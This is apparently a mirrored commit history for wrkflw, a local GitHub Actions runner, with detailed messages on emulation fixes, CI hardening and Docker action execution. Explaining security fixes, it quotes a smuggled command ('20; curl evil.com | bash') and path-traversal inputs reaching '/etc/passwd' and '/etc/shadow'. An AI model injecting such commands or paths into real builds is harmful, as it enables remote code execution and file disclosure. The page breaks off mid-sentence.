mirror of
https://github.com/bahdotsh/wrkflw.git
synced 2026-05-18 05:05:35 +02:00
6016887a3b5c71601bdb00331b24186bcd279c55
223 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
6016887a3b |
feat(executor): easy GHA emulation fixes for better compatibility (#82)
* feat(executor): add easy GHA emulation fixes for better compatibility
- Expand github.* context with 13 missing env vars (CI, GITHUB_ACTIONS,
GITHUB_REF_NAME, GITHUB_REF_TYPE, GITHUB_REPOSITORY_OWNER, etc.) and
improve GITHUB_ACTOR to use git config / $USER instead of hardcoded value
- Enforce timeout-minutes at both job level (default 360m per GHA spec)
and step level via tokio::time::timeout
- Implement defaults.run.shell and defaults.run.working-directory with
proper fallback chain: step > job defaults > workflow defaults > bash
- Implement hashFiles() expression function with glob matching, sorted
file hashing (SHA-256), and integration into the substitution pipeline
* fix(executor): harden hashFiles, working-directory, and shell -e
Three issues from code review, all in the "we got the GHA emulation
*almost* right" category:
1. hashFiles() was returning an empty string when no files matched.
GHA returns the SHA-256 of empty input (e3b0c44...), not nothing.
An empty string as a cache key component is the kind of thing
that silently ruins your day. Also, unreadable files were being
skipped without a peep — now we at least warn about it.
2. The working-directory default resolution was doing a naive
Path::join with user-controlled input. If someone writes
`working-directory: ../../../etc` or an absolute path, join
happily replaces the base. Inside a container this is *somewhat*
contained, but in emulation mode it's a real path traversal.
Normalize the path and reject anything that escapes the
workspace.
3. The bash -e flag change (correct per GHA spec) was undocumented.
Scripts that relied on intermediate commands failing without
aborting the step will now break. Document it in
BREAKING_CHANGES.md so users aren't left guessing.
* fix(executor): complete the GHA shell invocation and harden hashFiles
The previous commit added `-e` to bash but stopped there, even
though the BREAKING_CHANGES.md *literally documented* the full GHA
invocation as `bash --noprofile --norc -e -o pipefail {0}`. So we
were advertising behavior we weren't actually implementing. This is
not great.
Without `-o pipefail`, piped commands like `false | echo ok` would
silently succeed, which is exactly the kind of divergence that makes
you distrust an emulator. And without `--noprofile --norc`, user
profile scripts can interfere with reproducibility.
While at it, fix hashFiles error handling — it was silently
swallowing read errors and producing a partial hash, which is worse
than failing because you get a *wrong* cache key with no indication
anything went sideways. preprocess_hash_files and
preprocess_expressions now return Result and the engine surfaces
failures as step errors.
Also add the tests that should have been there from the start:
shell invocation flags, working-directory path traversal rejection,
and defaults cascade (step > job > workflow).
* fix(executor): harden hashFiles, timeout, and shell edge cases
The previous round of GHA emulation fixes left a few holes that
would bite you in production:
hashFiles() would happily glob '../../etc/passwd' and hash whatever
it found outside the workspace. It also loaded entire file contents
into memory before hashing, which is *not great* when someone points
it at a large binary artifact. The glob patterns now reject '..'
traversal, and file contents are streamed into the SHA-256 hasher
via io::copy instead.
timeout-minutes accepted any f64 from YAML, including negative
values, NaN, and infinity — all of which make Duration::from_secs_f64
panic. Non-finite and non-positive values now fall back to the GHA
default of 360 minutes.
Unknown shell values were silently accepted with a '-c' fallback.
Now they emit a warning so you at least *know* something is off.
While at it, replaced the hash_files_read_error_returns_err test
that was testing two Ok paths (despite its name) with proper
path-traversal rejection tests.
* fix(executor): fix shadowed timeout_mins and extract sanitization helper
It turns out the job timeout error path was re-reading the *raw*
timeout_minutes value instead of using the already-sanitized one.
If someone set timeout-minutes to NaN or a negative number, the
sanitization would correctly fall back to 360, but the error
message would happily print "Job exceeded timeout of NaN minutes."
Not great.
Extract sanitize_timeout_minutes() so both the job and step
timeout paths use the same logic instead of duplicating the
is_finite/positive/clamp dance. While at it, add proper tests
for NaN, Infinity, negative, zero, and the max clamp — plus a
test that actually exercises the job-level timeout expiry branch,
which previously had zero coverage.
|
||
|
|
040276e40a |
ci: modernize workflows to match mdterm CI pattern (#81)
* ci: modernize workflows to match mdterm CI pattern
Replace monolithic build.yml with split ci.yml (parallel fmt, clippy,
build+test jobs). Update all actions to modern versions (checkout@v4,
dtolnay/rust-toolchain, rust-cache@v2). Overhaul release workflow with
more build targets (musl, aarch64), simpler changelog, and crates.io
publish step.
* ci: fix broken cross-compilation targets and workspace publish
It turns out that the release workflow had a couple of targets that
were never going to work on GitHub-hosted runners.
The aarch64-pc-windows-msvc target needs ARM64 MSVC build tools
that simply aren't installed on windows-latest runners. And the
aarch64-unknown-linux-musl target was configured with
aarch64-linux-gnu-gcc as its linker — which is a *glibc* linker,
not a musl one. The resulting binaries would silently be linked
against glibc, completely defeating the point of a musl build.
Remove both broken targets rather than papering over them with
increasingly fragile cross-compilation hacks. The remaining six
targets are all either native builds or well-supported cross-
compilation (aarch64-linux-gnu with the correct gnu linker).
While at it, fix cargo publish — a bare `cargo publish` from a
workspace root doesn't know how to publish crates in dependency
order. Use cargo-workspaces which actually handles this correctly.
Also restore workflow_dispatch to CI so it can be triggered
manually when needed.
* ci: fix review issues in modernized workflows
The CI and release workflows from the previous modernization had a
few things that were just *not right*.
The CI build job was running `cargo build --release` which is
pointless in CI — we care about correctness and fast feedback, not
optimized binaries. It was also missing `--workspace` on both build
and test, so we were only checking whatever the root workspace
defaults resolved to. Clippy had the same problem — only linting
default features of default members, blissfully ignoring everything
else.
The release workflow had three issues: `git log HEAD` for first
releases only shows a single commit instead of the full history,
`--allow-dirty` on cargo publish silently masks unexpected checkout
state, and the workflow_dispatch trigger got dropped so there's no
way to manually re-run a failed release without pushing a new tag.
Fix all of it. Add --workspace and --all-features where they belong,
drop --release from CI build, fix the changelog range for first
releases, remove --allow-dirty, and restore workflow_dispatch.
* ci(release): harden release workflow against manual dispatch footguns
The release workflow had a bare workflow_dispatch trigger with no
inputs, which means manually re-running a failed release would use
the *branch name* as the tag. The changelog would be wrong, the
release would be named after a branch, and the publish job would
cheerfully push to crates.io regardless. Not great.
Three fixes:
Require a tag input on workflow_dispatch so manual re-runs actually
know what they're releasing. The changelog and release creation now
use inputs.tag || github.ref_name so both paths resolve correctly.
Guard the publish job with an if: startsWith(github.ref,
'refs/tags/v') check, because publishing to crates.io is
irreversible and "oops" is not an acceptable rollback strategy.
While at it, replace the cd-into-directory-and-back tar pattern
with tar -C, because changing directories in a shell script and
hoping you cd back correctly is the kind of thing that works right
up until it doesn't.
* ci: fix workflow_dispatch releasing into the void
The release workflow happily accepts a manual dispatch with any tag
string, then passes it to git log and softprops/action-gh-release
without ever checking if the tag actually *exists* as a git ref.
Confusion ensues — changelog generation silently produces garbage
and the release gets created pointing at nothing useful.
Add a tag validation step that fails fast with a clear error before
any downstream jobs run. Since both build and release already depend
on the changelog job via `needs`, this acts as a proper gate.
While at it, add --all-features to the CI build and test steps so
feature-gated code actually gets compiled and tested, not just
linted by clippy. Having clippy check code that never gets built
is the kind of false confidence that bites you on release day.
* ci(release): tighten tag validation and deduplicate tag resolution
The tag validation step was using `git rev-parse`, which happily
accepts *any* git ref — branches, commit SHAs, you name it. So if
someone created a branch called `v1.0.0` (don't ask), it would
sail right through validation and produce a release pointing at a
branch. Not great.
Switch to `git tag -l` so we only accept actual tags. That's the
whole point of a *tag* validation step.
While at it, hoist the `inputs.tag || github.ref_name` expression
into a workflow-level RELEASE_TAG env var instead of repeating it
in four different places. Also add a comment on the publish job's
`if` guard explaining that excluding manual dispatch is intentional
— because some future maintainer *will* look at that and think
it's a bug.
* ci(release): fix three lurking bugs in release workflow
The release workflow had a few issues that were just waiting to
bite someone at the worst possible time:
The prev_tag selection was grabbing *any* tag sorted by version,
not just version tags. If someone ever pushed a non-v* tag (say,
a test tag or a label), the changelog range would silently use
that as the baseline. Filter for "^v" prefixed tags first.
The cargo-workspaces install was unpinned, which means a breaking
release of that tool would break *our* release pipeline. In a
release workflow. The irony writes itself. Pin to 0.4.2.
While at it, fix the .cargo/config.toml creation for
aarch64-linux-gnu cross-compilation to use > instead of >> for
the first line, so we don't append duplicate entries if the file
somehow already exists.
* ci(release): fix three review issues in release workflow
The release workflow had a few things that would bite you at
exactly the wrong moment:
The prev_tag selection was using grep -v to exclude the current
tag, then grabbing the first result from a descending version
sort. Problem is, if you're doing a backport release for v1.0.1
and v2.0.0 already exists, you'd get v2.0.0 as your "previous"
tag. The changelog range would then be backwards and produce
garbage. Use sed to find the current tag's position in the sorted
list and grab the one *after* it instead.
The build job had no dependency on the changelog job, which means
tag validation could fail and six runners would still happily
churn away building binaries that nobody will ever use. Waste of
perfectly good CI minutes. Add needs: [changelog] so builds are
gated behind validation.
While at it, cap the first-release changelog to 100 commits. An
unbounded git log dumped into a GitHub release body is the kind
of thing that works fine until your repo has a thousand commits
and the API starts having opinions about payload size.
* ci(release): parallelize build, validate tag format, cache cargo-workspaces
Three things that should have been caught earlier:
The build job had a `needs: [changelog]` dependency for absolutely
no reason — it doesn't use any changelog outputs. All it did was
serialize the pipeline and add ~20s of dead time before the actual
builds started. The release and publish jobs already depend on both,
so the ordering was always preserved where it matters. Remove it.
The RELEASE_TAG env var comes from user input on workflow_dispatch,
and we were feeding it straight into sed patterns and git log range
expressions without validating the format first. Add a regex check
for vX.Y.Z *before* any shell interpolation happens. Defense in
depth — the trust boundary is already at repo write access, but
let's not be sloppy about it.
While at it, cache the cargo-workspaces binary in the publish job.
Compiling it from source on every single release is the kind of
waste that's easy to ignore until you don't.
* ci: harden CI permissions and fix release tag validation
The CI workflow was running with default token permissions, which
is more access than a read-only lint-and-build pipeline should ever
have. Add an explicit `permissions: { contents: read }` because
least-privilege is not optional.
The tag format regex in the release workflow was unanchored — it
matched *prefixes*, so `v1.0.0garbage` sailed right through. Anchor
it with `$` and add an optional pre-release suffix group so tags
like `v1.0.0-beta.1` still work. Please don't ship unanchored
validation regexes.
While at it, replace the sed-based prev-tag lookup with `grep -F -x`
for exact matching. The old sed pipeline treated dots in the tag as
regex wildcards, which is the kind of thing that works fine until it
doesn't. The new approach does literal matching and handles the
no-previous-tag edge case explicitly.
* ci(release): add --locked to builds and guard changelog tag lookup
The release builds were running without --locked, which means cargo
is free to re-resolve dependencies however it pleases. For a release
binary, that's *not great* — you want reproducible builds from the
exact Cargo.lock that was committed, not whatever cargo feels like
doing today.
While at it, the changelog generation was silently falling through
to the "list all commits" path if the release tag wasn't found in
the tag list. Now it emits a ::warning annotation so you at least
know something went sideways instead of staring at a suspiciously
long changelog wondering where it all came from.
|
||
|
|
14d30b6b57 |
feat(ui): add job selection mode to TUI for running individual jobs (#80)
* feat(ui): add job selection mode to TUI for running individual jobs
The CLI already has --job to run a single job, but the TUI had no
way to do this. You could only run entire workflows, which is the
kind of all-or-nothing approach that gets old fast when you have a
workflow with 12 jobs and you just want to re-run "lint".
Add a job selection sub-view to the Workflows tab. Press Enter on a
workflow to drill into its jobs (parsed via parse_workflow), then
Enter on a job to run just that one (with its transitive deps), or
'a' to run all, or Esc to go back. The selected job flows through
as target_job in ExecutionConfig, reusing the exact same filtering
logic the CLI --job flag already uses.
While at it, updated the status bar hints and help overlay to
document the new keybindings.
* fix(ui): stop target_job from leaking across queued workflows
The job selection feature added in
|
||
|
|
f05cbca3b9 |
feat(ui): make TUI optional behind a cargo feature flag (#79)
* feat(ui): make TUI optional behind a cargo feature flag The TUI is great for interactive use, but if you want to run wrkflw as a headless CI runner, dragging in ratatui and crossterm is pointless baggage. Issue #41 asked for this, and honestly the code was already well-isolated enough that it *should* have been optional from the start. Add a `tui` feature flag (default-on) to both the `wrkflw-ui` crate and the main binary crate. When disabled via `--no-default-features`, ratatui/crossterm are gone, the `tui` subcommand disappears, and running with no args prints help instead of launching the TUI. All CLI subcommands (validate, run, trigger, list) remain fully functional. While at it, removed the direct crossterm/ratatui deps from the binary crate — it never imported them, they were just coming through transitively anyway. * refactor(ui): feature-gate models and utils, clean up cfg imports The previous commit gated the TUI behind a feature flag but left the models and utils modules unconditionally compiled. It turns out that *every single consumer* of those modules is TUI-gated code — they were compiling to dead code when building with --no-default-features. Gate models and utils behind cfg(feature = "tui") where they belong. While at it, consolidate the five separate #[cfg(feature = "tui")] annotations on imports in workflow.rs into a single grouped use block, because repeating the same attribute five times in a row is not my idea of readability. Also add a cargo check --no-default-features step to CI so this kind of thing doesn't silently regress. * ci(build): drop archived actions-rs/cargo, add --workspace to feature check The actions-rs/cargo@v1 action has been archived for a while now, and wrapping every cargo invocation in a GitHub Action that just... calls cargo... was never exactly adding value. Replace all five uses with plain `run: cargo <cmd>` steps. While at it, add --workspace to the --no-default-features check so it actually verifies *all* crates compile without the tui feature, not just the default workspace member. The previous version would happily miss breakage in any non-default crate. |
||
|
|
ebabe6414a |
feat(validate): cross-check local composite action required inputs (#78)
* feat(validate): cross-check local composite action required inputs The validate command was happily declaring workflows "valid" even when they used a local composite action without providing its required inputs. The workflow would then blow up at runtime, which is *exactly* the kind of thing a validator should catch. The problem was that validate_action_reference() only checked whether the local action path existed on disk. It never bothered to read the action.yml, look at the inputs section, or verify that required inputs were actually provided in the step's `with:` block. So it was doing about half its job. Thread the repo root path through the validator call chain (evaluate_workflow_file → validate_jobs → validate_steps → validate_action_reference) so we can resolve local action paths. Then read and parse the action.yml, extract inputs with `required: true` and no default, and flag any that are missing from the step's `with:` params. Case-insensitive matching because that's what GitHub Actions does. Graceful degradation: if we can't find the repo root or the action file is unreadable, we silently skip rather than blowing up. 10 new unit tests cover the various cases. Closes #67 * fix(validate): handle string `required` and drop unsafe cwd fallback Two bugs in the local action input validation that just landed: First, `find_repo_root` was falling back to `current_dir()` when no `.git` directory was found. This is *wrong* — if you're validating a workflow outside a git repo, the cwd could be literally anywhere, and you'd end up resolving local action paths against some random directory. Return `None` and skip the check instead. Second, `required: 'true'` (as a YAML string) was silently treated as not required, because we only checked `as_bool()`. GitHub Actions treats the string "true" as truthy, so we should too. Add case-insensitive string matching alongside the bool check. While at it, add a test for the string `required` case so we don't regress on this. |
||
|
|
452044f9d2 |
feat(cli): add --job flag to run a specific job and --jobs to list them (#77)
* feat(cli): add --job flag to run a specific job and --jobs to list them Until now, wrkflw only operated at the workflow level. You could run an entire workflow or list workflow files, but if you wanted to debug a single failing job you had to sit through every other job first. This is not great. Add `--job <name>` to `wrkflw run` so you can execute exactly one job in isolation, skipping dependency resolution entirely. Add `--jobs` to `wrkflw list` so you can actually *see* what jobs are available before running them. Both work for GitHub workflows and GitLab pipelines. The filtering happens after dependency resolution — we just replace the execution plan with a single-job batch. If the job name doesn't exist, we tell you what's available instead of silently doing nothing. The TUI still runs full workflows; job selection there is a separate concern. Closes #68 * fix(executor): include transitive deps when running a single job The --job flag was replacing the entire execution plan with just the target job, silently dropping all its dependencies. So if you ran --job deploy and deploy needs build which needs setup, you'd get deploy running alone with none of its prerequisites. Confusion ensues. Extract the duplicated inline filtering (copy-pasted verbatim across both the GitHub and GitLab execution paths) into a shared filter_plan_to_job() helper in dependency.rs. The new logic walks the needs graph via BFS to collect transitive deps, then prunes the existing topologically-sorted plan to only include relevant jobs while preserving batch ordering. Add 9 unit tests covering the dependency collection and plan filtering — linear chains, diamond graphs, partial subgraph isolation, error paths, and empty batch removal. * fix(executor): use stage-aware filtering for GitLab --job flag It turns out that filter_plan_to_job walks `needs` edges to find transitive dependencies, which works fine for GitHub workflows. But GitLab pipelines use *stage ordering* for implicit dependencies, and convert_to_workflow_format sets `needs: None` on every converted job. So running `--job deploy` on a GitLab pipeline would silently drop all build and test jobs. Not great. Add filter_plan_to_job_by_stage that understands the GitLab model: keep all jobs in earlier stage batches (they're implicit deps) and filter only the target's own batch down to just the target job. The GitHub workflow path continues using the needs-based filter. While at it, extract the job-not-found error into a shared helper and add proper test coverage: 6 unit tests for the stage-aware filter plus 3 integration tests exercising the full execute_workflow path with target_job set. |
||
|
|
781bd42b21 |
fix(docker): persist setup action images across job steps (#76)
* fix(docker): persist setup action images across job steps Reported in #60. When a workflow uses actions like setup-node or setup-php, the Docker image resolved for that action (e.g. node:20-slim, composer:latest) was only used for the action step itself. Every subsequent `run:` step would blissfully fall back to ubuntu:latest, which of course has neither node nor composer. Confusion ensues. It turns out that `execute_job()` computes `runner_image_value` exactly *once* via `get_effective_runner_image()` and never updates it. The action step gets its own image from `prepare_action()`, but that image is completely ignored for subsequent `run:` steps. So your setup-node configures... nothing, as far as run steps care. Fix this by pre-scanning all job steps for known setup actions before the step loop begins. Single setup action? Use its image. Multiple setup actions (e.g. Laravel's PHP + Node.js combo)? Build a combined Dockerfile that installs all required runtimes on the ubuntu base. No setup actions? Nothing changes — fully backward compatible. While at it, skip the pointless pull attempt for locally-built wrkflw-* images (they only exist locally, the 404 from Docker Hub was just noise), and bump the build_image timeout from 2 minutes to 10 — because installing PHP from a PPA inside a Docker build is not a speed demon. Closes #60 * fix(docker): harden setup action runtime detection against injection and waste The setup action detection code was interpolating user-controlled version strings straight into Dockerfile RUN directives with zero validation. So a workflow with node-version: "20; curl evil.com | bash" would happily inject arbitrary commands into the build. This is not great. It also used starts_with() for action name matching, which would match actions/setup-node-legacy or anything else that happened to share the prefix. And every single build generated a UUID-tagged image that was never cleaned up, so you'd accumulate orphaned wrkflw-combined:* images until your disk had opinions about it. While at it, the 2-minute to 10-minute timeout bump was applied to *all* image builds, not just the combined runtime ones that actually need it. And the Go install script hardcoded linux-amd64, which is the kind of thing that works right up until someone runs on ARM. Let's fix all of it: - Validate version strings against [a-zA-Z0-9._-] before use - Use exact equality for action repo matching, not prefix matching - Use deterministic content-based image tags so identical runtime combinations reuse cached images - Deduplicate same-language setup steps (last one wins) - Scope the 10-minute timeout to wrkflw-combined:* builds only - Detect container architecture for Go installs - Add tests for all of the above * fix(docker): fix three correctness bugs in setup action image resolution The previous commit introduced setup action detection, but it had a few problems that would bite people in practice. First, the single-runtime path was returning bare images like node:20-slim or python:3.12-slim directly. These images don't have git installed, which means actions/checkout — typically the *first* step in any workflow — would just fail. Not great. Fix: always build a combined image on top of the runner base (catthehacker/ubuntu:act-latest) even for single-runtime jobs, so git and friends remain available. The SetupRuntime.image field is now dead code, so remove it entirely. Second, the Python install script was cheerfully ignoring the requested version and installing whatever python3 the distro ships. Ask for 3.12, get 3.10. Surprise. Fix: use the deadsnakes PPA to install the specific version requested. Third, PodmanRuntime had no skip-pull guard for locally-built wrkflw-* images, so podman would attempt to pull wrkflw-combined:* from a registry. Add --pull=never for wrkflw-* prefixed images. * refactor(docker): unify setup action registry and fix remaining review issues The previous commits introduced setup action detection, but left a few things in a state that would annoy anyone who looked closely. First, determine_action_image() was still using starts_with() for action matching — the exact same bug that detect_setup_runtimes had already fixed. So "actions/setup-node-legacy" would happily match as a Node.js setup action. Not great. Second, dtolnay/rust-toolchain conventionally encodes the toolchain in the @ref (e.g., @nightly, @1.75.0), not in a with.toolchain key. The old code would silently default to "stable" for anyone using the idiomatic form. Surprise. Third, the repetitive if/else chain in detect_setup_runtimes (seven near-identical blocks) and the parallel match in determine_action_image were two independent copies of the same knowledge, with no compile-time guarantee they'd stay in sync. Adding a new setup action meant editing two places and hoping you remembered both. Fix all of it: - Introduce a single SETUP_ACTIONS const table that both functions consume, eliminating the drift risk entirely - Add version_from_ref support so dtolnay/rust-toolchain@nightly actually produces "nightly" instead of "stable" - Extract generate_combined_dockerfile() and combined_image_tag() as pure testable functions - Merge all install scripts into a single RUN layer instead of N separate apt-get update calls - Include a content hash in image tags so install script changes invalidate cached images even when language/version pairs are the same - Add 15 tests covering all the above * fix(docker): add image caching, stable hashing, and shared constants The combined runtime image code had three problems that were all independently annoying but together made for a lovely trifecta of "why is this slow and also fragile." First, build_combined_runtime_image was *always* rebuilding the Docker image, even when a perfectly good one already existed locally. That means every single job run was creating temp dirs, writing Dockerfiles, tarring contexts, and shipping them to the daemon. For absolutely no reason. Second, the image tag hash used DefaultHasher, which Rust's own docs explicitly say is not stable across versions. So upgrading your Rust toolchain silently invalidates every cached image. Not great when caching is the whole point. Third, the "wrkflw-" and "wrkflw-combined:" prefixes were hardcoded as magic strings in three separate files. Change one, forget the others, and you get to debug why podman is trying to pull a locally-built image from Docker Hub. The fix: add image_exists() to ContainerRuntime so we can skip redundant builds, replace DefaultHasher with FNV-1a for stable cross-version hashing, and extract the prefixes into shared constants. While at it, merge the duplicate apt-get update calls in the generated Dockerfile into a single RUN layer. * fix(docker): fix version_from_ref with SHA pins and normalize .x suffixes The version_from_ref logic for dtolnay/rust-toolchain was happily treating a pinned git SHA (the 40-char hex kind) as a toolchain name. So `dtolnay/rust-toolchain@d4ff7a3c5...` would try to install Rust toolchain "d4ff7a3c5...", which rustup finds *deeply* confusing. Filter out bare SHAs with the existing is_git_sha() check and fall back to the default version instead. While at it, the ".x" suffix that's idiomatic for Node versions (e.g., "16.x") was leaking through to install scripts for every language. Python would try to apt-get install python16.x, which is not a real package and never will be. Normalize the suffix away at extraction time rather than making each install script deal with it independently. Add tests for both cases. |
||
|
|
fd348a460e |
fix: actually execute Docker-based GitHub Actions instead of emulating them (#74)
* fix(executor): actually execute Docker-based GitHub Actions instead of emulating them Third-party GitHub Actions that use Docker (like super-linter) were silently passing without ever *actually running*. The engine would resolve the action, pick a Docker image, and then... run `echo 'Would execute GitHub action: ...'` inside it. Every single time. Regardless of runtime mode. Confusion ensues. It turns out there were two separate failures conspiring here: 1. `prepare_action()` would error out on `ActionType::DockerBuild` with "not yet supported", fall back to `determine_action_image()`, and cheerfully return `node:20-slim` for super-linter. This is not great. 2. The `PreparedAction::Image` execution branch had three sub-paths for is_docker, is_local, and everything else — and *all three* just ran echo commands. The image was resolved correctly and then completely ignored. The fix has several parts: - Add a `NativeDocker` variant to `PreparedAction` that means "run this image with its built-in ENTRYPOINT, no command override." Docker registry actions and DockerBuild actions both use this. - Implement DockerBuild properly: clone the repo, resolve the Dockerfile path from action.yml, build it, return the tag. Uses the existing `shallow_clone` and `runtime.build_image`. - Fix `build_image_inner` to tar the *full context directory* instead of just the Dockerfile. The old code had `_context_dir` sitting right there, computed and unused. COPY instructions in Dockerfiles need the context, obviously. - Allow empty `cmd` in `run_container` to mean "use the image's default ENTRYPOINT/CMD". The Docker impl now sets `config.cmd = None` when cmd is empty. Podman already handled this correctly. The existing `PreparedAction::Image` path with all its special-cased action handling (actions-rs, checkout, etc.) is completely untouched. Closes #59 * fix(executor): fix macOS entrypoint hang, path traversal, and silent emulation pass Three bugs in the Docker action execution path from the previous commit: 1. The macOS emulation entrypoint override (`bash -l -c`) was applied *unconditionally*, even when cmd was empty (NativeDocker path). That means Docker actions running on macOS emu images would get bash with no argument — which either hangs forever or exits immediately. The image's real ENTRYPOINT gets discarded either way. This is not great. Fix: capture `has_cmd` before cmd_vec is moved into the config, only apply the bash wrapper when there's actually a command to wrap. 2. The `dockerfile_rel` extracted from action.yml's `runs.image` was not sanitized after stripping the `docker://` prefix. A malicious action.yml with `docker:///etc/shadow` or `../../sensitive` would escape the action directory via Path::join's absolute-path behavior or dotdot traversal. Fix: strip leading slashes and reject any path containing `..`. 3. Emulation mode returned exit_code 0 for Docker actions it *didn't actually run*. Users got a green checkmark for actions that were silently skipped. Confusion ensues. Fix: return exit_code 1 with a clear stderr message explaining the action was not executed and needs --runtime docker. While at it, add tests for all three fixes: NativeDocker variant construction, dockerfile path sanitization (6 cases), and emulation empty-cmd failure behavior. * fix(executor): harden Docker action security and fix docker:// execution path Three issues found during review, all in the Docker action plumbing: 1. The `is_docker` path in `prepare_action()` was returning `PreparedAction::Image` instead of `NativeDocker`, which means `docker://` prefixed actions in `uses:` went straight through the legacy echo-command path and *never actually executed*. Same class of bug we just fixed for DockerBuild, hiding in plain sight. 2. The path traversal check for Dockerfile paths used `contains("..")`, which rejects perfectly legitimate directory names like `foo..bar/`. Check for `..` as an actual path *component* instead via `split('/').any(|c| c == "..")`. 3. `build_image_inner` was calling `append_dir_all` on untrusted action repositories without disabling symlink following. A malicious action repo could plant a symlink pointing at the host filesystem and have its contents shipped into the Docker build context. That's the kind of thing that makes security auditors lose sleep. Set `follow_symlinks(false)` on the tar builder. * fix(executor): wire up runs.entrypoint, runs.args, and fix local Docker dispatch The previous commits got the NativeDocker path working for remote actions, but left several holes that a code review correctly identified. Let's fix them all. First, local Docker actions (uses: ./my-action with a Dockerfile) were *still* returning PreparedAction::Image instead of NativeDocker. Same class of bug we just fixed for remote actions, hiding one function call away. They now go through NativeDocker and parse the local action.yml for entrypoint/args. Second, runs.entrypoint and runs.args from action.yml were being completely ignored. Docker actions that declare their entrypoint in action.yml (which is, you know, *a lot of them*) would silently use the wrong entrypoint. Add an entrypoint parameter to the ContainerRuntime trait and thread it through all four implementations: Docker sets Config.entrypoint, Podman passes --entrypoint, and the emulation runtimes accept-and-ignore it. Third, with.args from workflow steps (uses: docker://alpine with args: "echo hello") was not being passed as container CMD. It now overrides runs.args when present, matching GitHub Actions behavior. While at it: - Extract sanitize_dockerfile_rel into a real function instead of having the tests duplicate the logic and test their own copy. Testing a copy of your code instead of the actual code is not what I'd call confidence-inspiring. - Add canonicalize() defense-in-depth after Dockerfile path resolution to catch symlink escapes. - Document the build_image_inner context directory invariant. * fix(executor): fix broken args parsing, empty dockerfile path, and silent entrypoint drop Three correctness bugs found during review of the Docker action execution path: 1. with.args was being split on whitespace like a caveman. An argument like "hello world" would turn into two separate args, which is *not* how GitHub Actions works. Use shlex::split() for proper shell-word parsing, with a whitespace fallback for malformed input that shlex chokes on. 2. sanitize_dockerfile_rel() happily accepted empty strings. Feed it "" or "docker://" and it would produce an empty path, which then joins to a directory instead of a file. The subsequent docker build would fail with a confusing error. Let's just reject empty paths upfront. 3. SecureEmulationRuntime silently swallowed the entrypoint override without telling anyone. If you're running in secure emulation mode and your action specifies runs.entrypoint, you deserve to know it's being ignored — not left wondering why your action isn't doing what you expect. * fix(executor)!: pass explicit build context to Docker image builds It turns out that build_image_inner was deriving the Docker build context from dockerfile.parent(), which is *wrong* when the Dockerfile lives in a subdirectory of the action root. An action with runs.image: subdir/Dockerfile would get subdir/ as its build context instead of the action root, silently breaking every COPY instruction that references files outside that subdirectory. The fix is straightforward: add an explicit context_dir parameter to the ContainerRuntime::build_image trait so callers tell us what the context is instead of us guessing from the Dockerfile path. The DockerBuild path in engine.rs now passes &action_dir, and the Docker inner implementation computes the Dockerfile path relative to context_dir via strip_prefix instead of just using file_name(). While at it, add a warning log when shlex::split fails to parse with.args (unmatched quotes). Previously this silently fell back to naive whitespace splitting, which is the kind of thing that makes you stare at container logs for an hour wondering why your quoted argument got split into three pieces. * fix(executor): reject bad dockerfile paths instead of silently guessing Three bugs found during review: The build_image_inner strip_prefix fallback was *silently* using just the filename when the Dockerfile wasn't a clean descendant of the context directory. So if something weird happened with the path, you'd just get the wrong Dockerfile used for the build with zero indication anything went wrong. That's not a fallback, that's a footgun. Return an error instead. sanitize_dockerfile_rel was happily preserving a leading "./" from the raw path, which then caused strip_prefix to fail (because "./build/Dockerfile" is not a prefix-match for a joined path). Strip it early so the downstream path arithmetic actually works. While at it, extract_docker_runs_config was using filter_map on runs.args, which means non-string YAML values like integers and booleans were silently dropped. GitHub Actions coerces those to strings, so we should too. * fix(executor): handle string-form args and reject malformed with.args It turns out that extract_docker_runs_config only handled runs.args as a YAML sequence. If an action.yml declared args as a plain string (which GitHub Actions absolutely allows), we'd silently drop the entire argument. Not great. While at it, the with.args parser had the opposite problem — when shlex::split hit an unmatched quote, it shrugged and fell back to naive whitespace splitting. That's the kind of "graceful degradation" that produces subtly wrong container invocations and makes you spend an afternoon wondering why your action is getting the wrong flags. Fix both: extract_docker_runs_config now handles args as either a YAML sequence or a string (shell-tokenized via shlex). The with.args path now returns a hard error on malformed quoting instead of pretending everything is fine. Added tests for string-form args including the bad-quoting edge case. * fix(executor): close sub_path traversal hole and make args parsing consistent It turns out that sub_path from action references (the part after owner/repo in owner/repo/some/subdir) was being joined to the clone directory with absolutely no sanitization. A crafted sub_path like "../../etc" would escape the cloned repo and get passed as the Docker *build context*. Please don't do that. Add sanitize_sub_path() that rejects any path component equal to "..", and apply it in both the DockerBuild and Composite action paths. For DockerBuild, also canonicalize the resolved action_dir and verify it's still inside the repo_dir — because symlinks exist and trusting user-controlled paths is how we end up on HN. While at it, fix a behavioral inconsistency in args parsing: bad quoting in action.yml's runs.args was silently falling back to the raw string, while the exact same bad quoting in a workflow's with.args was a hard error. Now both are errors, because silently doing the wrong thing is worse than loudly refusing. * fix(executor): harden Docker build context, sanitize inputs, deduplicate mount setup The PR review flagged several issues ranging from correctness to performance to plain old code smell. Let's address them all. It turns out that build_image_inner was happily tarring the *entire* context directory and shipping it to the Docker daemon, cheerfully ignoring any .dockerignore file. For large action repos with test fixtures, docs, and who knows what else, this is not great. When a .dockerignore exists, we now use the `ignore` crate's WalkBuilder to walk only non-ignored files. Falls back to the old append_dir_all when there's no .dockerignore, because we're not breaking anything that already works. The sanitize_sub_path and sanitize_dockerfile_rel functions checked for ".." traversal but not null bytes, which can cause truncation at OS boundaries and potentially bypass the traversal check. Please don't do that. Added null byte rejection to both. extract_docker_runs_config was taking &Option<T> instead of Option<&T>, which is the Rust equivalent of wearing your shirt inside out — it works, but everyone who sees it knows something is wrong. Fixed the signature and all callers. The with.args empty-string handling was also wrong: `with.args: ""` was treated as "no override" instead of "pass zero args", which doesn't match GitHub Actions behavior where the presence of the key is the signal, not its value. While at it, extracted the volume/env/mount setup boilerplate that was copy-pasted across three execution paths into a StepContainerContext helper. Not because I enjoy moving code around, but because the same 12 lines in three places is not my idea of maintainability. * fix(executor): cap build context size, disable git hooks, add NativeDocker tests Three security and reliability fixes from the PR review: The build_image_inner tar buffer was completely unbounded — a malicious or just absurdly large action repo with no .dockerignore would happily try to load the entire thing into memory. Now we track cumulative file sizes and bail at 500 MB. The old append_dir_all fallback had to go since it gives us no per-file hook; replaced it with an ignore::WalkBuilder walk (already a dep) so both paths enforce the same limit. shallow_clone was happily running git checkout on untrusted repos without disabling hooks. A cloned repo's .git/hooks/post-checkout runs automatically, which is the kind of thing that makes security reviewers lose sleep. Pass -c core.hooksPath=/dev/null to every git invocation so cloned repos can't execute anything on our host. While at it, 